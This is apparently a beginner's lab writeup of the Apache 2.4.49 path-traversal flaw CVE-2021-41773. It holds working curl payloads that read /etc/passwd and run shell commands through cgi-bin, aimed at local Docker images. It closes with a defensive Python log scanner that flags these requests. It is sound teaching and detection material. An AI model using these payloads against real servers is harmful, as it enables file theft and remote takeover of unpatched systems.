Related vulnerability
Description
CVE-2021-41773
Introduction
# CVE-2021-41773
Hello guys, yesterday the new CVE-2021-41773 for Apache 2.4.49 was released, so in this post I want to explain this Apache vulnerability.
# Playground
So, I think you guys want to test this vulnerability against a website, so I have a playground for you.
This is the page to download the Docker image of an example Apache 2.4.49: [Docker Image](https://hub.docker.com/r/blueteamsteve/cve-2021-41773/tags)
Note: there are two image tags, `with-cgid` and `no-cgid`. You need to download both images.
# Usage
First download the Docker images to your machine.
# Pull Docker Images
```
# no-cgid image (used for the local file disclosure section)
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
# with-cgid image (used for the remote code execution section)
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
```
# Run Image
```
# no-cgid image, reachable on http://localhost:8080
sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
# with-cgid image, mapped to 8081 so both containers can run side by side
# (the RCE commands later in this writeup target port 8081)
sudo docker run -dit -p 8081:80 blueteamsteve/cve-2021-41773:with-cgid
```
# Disclaimer
Honestly, I don't know how the researcher thought to find this vulnerability, so I can't explain it fully. But I will try my best to talk about everything I understand about this CVE.
# Vulnerability
This CVE is a little interesting because it has two vulnerabilities: `LFD` (**Local File Disclosure**) and `RCE` (**Remote Code Execution**). Cool! So, in this post I will explain both vulnerabilities of this CVE.
# Local-file-disclosure (use the **no-cgid** docker image)
So, let's start with the **Local file disclosure** vulnerability. If you are familiar with Apache, you know that `cgi-bin` (Common Gateway Interface) is the default path that defines a way for the web server to interact with external content-generating programs in Apache 2.4.49.
But this path is `Forbidden` for everyone, even the admin. Hmm, that's interesting, right?
And if you are familiar with **Local file disclosure** vulnerabilities, you might know that many `LFD` vulnerabilities are found in forbidden paths.
So let's test simple LFI payloads in the `/cgi-bin/` path.
I put `../../../../../` before `/etc/passwd`.
(**If you want to know what `../` is, check out this blog post: [Local file disclosure bypass](https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion)**)
With curl:
```
curl http://localhost:8080/cgi-bin/../../../../../etc/passwd
```

With Burp Suite: (screenshot not included here)

As you can see, we get an error with this simple payload. With curl we get a `404 Not Found` and with Burp we get a `400 Bad Request`. The difference is that curl collapses the `../` segments itself before sending the request, so the server only sees `/etc/passwd` under the document root, which does not exist; Burp sends the raw path and Apache's path check rejects the traversal.
That means we should URL-encode our payload. So let's try it and see what we get.
I URL-encode the `.`. **Note: `.` is `%2E` (also `%2e`) in URL encoding.**
With curl:
```
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```

With Burp: (screenshot not included here)

Yes! Our payload works now. We can read the `/etc/passwd` of the web server. The reason it works is that Apache 2.4.49 checked the path for `..` segments before percent-decoding it, so `.%2e` slipped past the check and was only turned into `..` afterwards.
So I hope you now understand the `LFD` vulnerability of this CVE. Let's continue to the `RCE` vulnerability of this Apache 2.4.49 CVE.
# Remote-Code-Execution (use the **with-cgid** docker image)
To understand the RCE vulnerability of this CVE, you need to understand some basics of `RCE` and some `Linux basics`.
**Check out this blog post to learn [What is RCE](https://www.n-able.com/blog/remote-code-execution)**
Ah, I think you thought I misspoke when I said you need `Linux basics`. Nope, I did not, because we actually need them. So let's begin!
First let me show the working payload, and then I will explain how it works.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;whoami'
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
With curl: (screenshot not included here)

# Payload-Explanation
So let me explain this payload.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
As you can see, the path **`/cgi-bin/`** and the encoding **`.%2e`** are the same as before. But there are two more pieces now: `-d` (**data**) and `/bin/sh` (a **shell**, like `/bin/bash`). So, let me explain why we need them.
# /bin/sh
First, we want remote code execution, right?
As you know, on Linux-based systems a shell such as `/bin/sh` or `/bin/bash` is the program that executes the commands you type. So we need a shell on the web server to execute our commands, and because the traversal goes through `cgi-bin`, Apache runs the file it resolves (here `/bin/sh`) as if it were a CGI script. Check out [What is Bash in Linux](https://opensource.com/resources/what-bash).
# Data
Okay, now let's say we can reach `/bin/sh`. We only need to inject our commands, and we can send them as the request body with curl's `-d`; a CGI program receives the request body on its standard input, so the shell reads our commands from there.
So our payload is `C|echo;id`. Let me explain what this is.
The `C` is nothing. We can put anything we want before the `|`, like `Comedy|`.
The `echo;id` is just a Linux trick: `echo` prints an empty line first, which the CGI handler needs to separate the response headers from the body, and then `id` runs and its output is sent back. **So that is why I said you need Linux basics.** [Echo basics](https://www.youtube.com/watch?v=tYmFsyH7VJY)
If we put these together, we get RCE on Apache 2.4.49.
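From the defender's side, the two sections above (the `.%2e` traversal for file disclosure and the POST to `/bin/sh` through `cgi-bin`) leave clear traces in the access log. The following script is an added example, not part of the original writeup or of the Docker images: it parses a few constructed Apache access-log lines, percent-decodes each request path until it is stable, then removes dot segments the way the fixed server does (decode first, normalize second) and flags requests that only look harmless before decoding. It goes slightly beyond the writeup by also catching double-encoded `%252e` paths. The log format, the sample lines, the IP addresses and the rule names are all assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined-style format); none of
# this is real traffic. The first three mirror the requests discussed above.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2021:03:41:37 +0000] "GET /cgi-bin/../../../../../etc/passwd HTTP/1.1" 400 226
10.0.0.5 - - [08/Oct/2021:03:55:53 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1147
10.0.0.5 - - [08/Oct/2021:04:14:44 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 48
10.0.0.9 - - [08/Oct/2021:04:16:10 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 404 196
10.0.0.7 - - [08/Oct/2021:04:20:00 +0000] "GET /index.html HTTP/1.1" 200 45
10.0.0.7 - - [08/Oct/2021:04:21:00 +0000] "GET /cgi-bin/test-cgi?x=1 HTTP/1.1" 403 199
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def fully_decode(path: str) -> str:
    """Percent-decode until the string stops changing, so '%252e' unwraps too."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path


def normalize(decoded_path: str):
    """RFC 3986 dot-segment removal on an already decoded path.

    Returns (normalized_path, escaped_root); escaped_root is True when a '..'
    segment would climb above '/'. Apache 2.4.49 did this step *before*
    percent-decoding, so '.%2e' was not recognised as '..'."""
    segments, escaped_root = [], False
    for seg in decoded_path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if segments:
                segments.pop()
            else:
                escaped_root = True
            continue
        segments.append(seg)
    return '/' + '/'.join(segments), escaped_root


def traversal_indicators(method: str, raw_target: str) -> list:
    """Return the reasons a request looks like CVE-2021-41773 abuse (empty = clean)."""
    path = raw_target.split('?', 1)[0]          # ignore the query string
    once = unquote(path)
    decoded = fully_decode(path)
    normalized, escaped_root = normalize(decoded)
    reasons = []
    if '%2e' in path.lower():                   # '.' never needs encoding in a path
        reasons.append('percent-encoded dot in path')
    if once != decoded:                         # more than one layer of encoding
        reasons.append('double-encoded path')
    if '..' in decoded.split('/'):              # browsers and curl squash these
        reasons.append('dot-dot segment after decoding')
    if escaped_root:
        reasons.append('traversal climbs above the URL root')
    if (path.startswith('/cgi-bin/') and method == 'POST'
            and normalized.endswith(('/bin/sh', '/bin/bash'))):
        reasons.append('POST to a shell binary via cgi-bin')
    return reasons


def scan_log(text: str) -> list:
    """Parse each line and collect alerts as (ip, method, target, status, reasons)."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue    # unexpected format; a real pipeline would count these
        reasons = traversal_indicators(m['method'], m['target'])
        if reasons:
            alerts.append((m['ip'], m['method'], m['target'], int(m['status']), reasons))
    return alerts


if __name__ == '__main__':
    for ip, method, target, status, reasons in scan_log(SAMPLE_LOG):
        print(f'{ip} {method} {target} -> {status}: {", ".join(reasons)}')
```

Note that the first sample line is flagged even though the server answered `400`: a rejected traversal is still reconnaissance worth seeing, which is why the rules look at the request path rather than the status code. The `escaped_root` flag is the signal that matters most for prioritisation, since a legitimate URL never needs to climb above the root.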
# Thanks!
Thanks for reading, guys. This is my first writeup for a CVE. Forgive me if I was bad at explaining it, and please give me suggestions.

File snapshot
[4.0K] /data/pocs/cc65bebcd975d4e92e9b1c2ccb838dfeccf1d2c5
├── [4.0K] images
│ ├── [ 50K] Screenshot from 2021-10-08 03-41-37.png
│ ├── [331K] Screenshot from 2021-10-08 03-55-53.jpg
│ ├── [126K] Screenshot from 2021-10-08 04-14-44.png
│ ├── [195K] Screenshot from 2021-10-08 04-23-07.png
│ ├── [ 52K] Screenshot from 2021-10-08 04-42-23.png
│ └── [150K] Screenshot from 2021-10-08 05-16-30.jpg
└── [5.5K] README.md
1 directory, 7 files